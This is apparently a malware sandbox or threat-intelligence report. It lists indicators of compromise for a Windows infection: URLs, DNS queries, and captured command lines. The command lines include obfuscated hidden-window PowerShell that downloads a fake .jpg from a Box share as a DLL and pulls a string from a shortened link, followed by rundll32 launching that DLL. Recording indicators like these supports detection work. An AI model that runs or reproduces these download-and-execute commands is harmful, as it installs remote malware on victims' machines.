Technical Information
- https://tecmundocombr.box.com/shared/static/6pi9g9bzod924f2qta2oogd3z52vvyka.jpg as %temp%\qtehbi_user_lpddk.dll
- http://bi#.ly/2gy6iuk
- http://bi#.ly/2gy6IuK
- http://www.go###e.com.br/A27/contador/301116.aspx
- DNS ASK bi#.ly
- DNS ASK te#####ocombr.box.com
- DNS ASK go###e.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (nEw-objEct systEm.nEt.wEbcliEnt).downloadfilE('""https://tecmundocombr.box.com/shared/static/6pi9g9bzod924f2qta2oogd3z52vvyka.jpg','%TEMP%\qtehbi_user_lpddk.dll');cd $Env:TEMP ;start-procEss r...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (nEw-objEct nEt.wEbcliEnt).downloadstrinG('http://bi#.ly/2gy6IuK')"' (with hidden window)
- '<SYSTEM32>\rundll32.exe' qtehbi_user_lpddk.dll starter